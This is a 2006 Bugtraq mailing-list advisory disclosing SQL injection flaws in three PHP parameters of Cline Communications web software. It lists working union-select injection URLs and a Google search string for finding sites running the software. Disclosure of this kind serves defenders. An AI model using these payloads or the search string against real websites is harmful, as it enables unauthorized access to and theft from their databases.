[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060617131604.28738.qmail@securityfocus.com>
Date: 17 Jun 2006 13:16:04 -0000
From: liz0@...mail.com
To: bugtraq@...urityfocus.com
Subject: Cline Communications Sql injection
Cline Communications Sql injection
-------------------------------------
Site:http://www.celerondude.com/
Demo:http://www.liveelite.com/
---------------------------------
Sql injection
1,photo_enlarged.php file Photo_ID parameter
2,newsdetail.php file NID parameter
3,staff_photo_enlarged.php file Staff_ID parameter
http://website/photo_enlarged.php?Photo_ID='sql
http://website/newsdetail.php?NID='sql
http://website/staff_photo_enlarged.php?Staff_ID='sql
Example:
http://localhost/staff_photo_enlarged.php?Staff_ID=-1+union+select+1,2,3,4,5,6+from+Staff
http://localhost/photo_enlarged.php?Photo_ID=-1+union+select+1,2,3,4,5,6,7,8,9,1+from+PHOTO
http://localhost/newsdetail.php?NID=-1+union+select+1,2,3,4,5+from+News
http://localhost/newsdetail.php?NID=-1+union+select+News_date,news_id,3,news_date,5+from+News
-----------------------------------------
Credit:Liz0ziM
E-mail:liz0@...mail.com
Site:www.biyo.tk www.biyosecurity.be
Greeatz:My All Friend
-----------------------------------------
Google:
"This site powered by Cline Communications"
-----------------------------------------
Source:
http://www.blogcu.com/Liz0ziM/714903/
http://liz0zim.no-ip.org/cline.txt
http://biyosecurity.be/bugs/cline.txt
Powered by blists - more mailing lists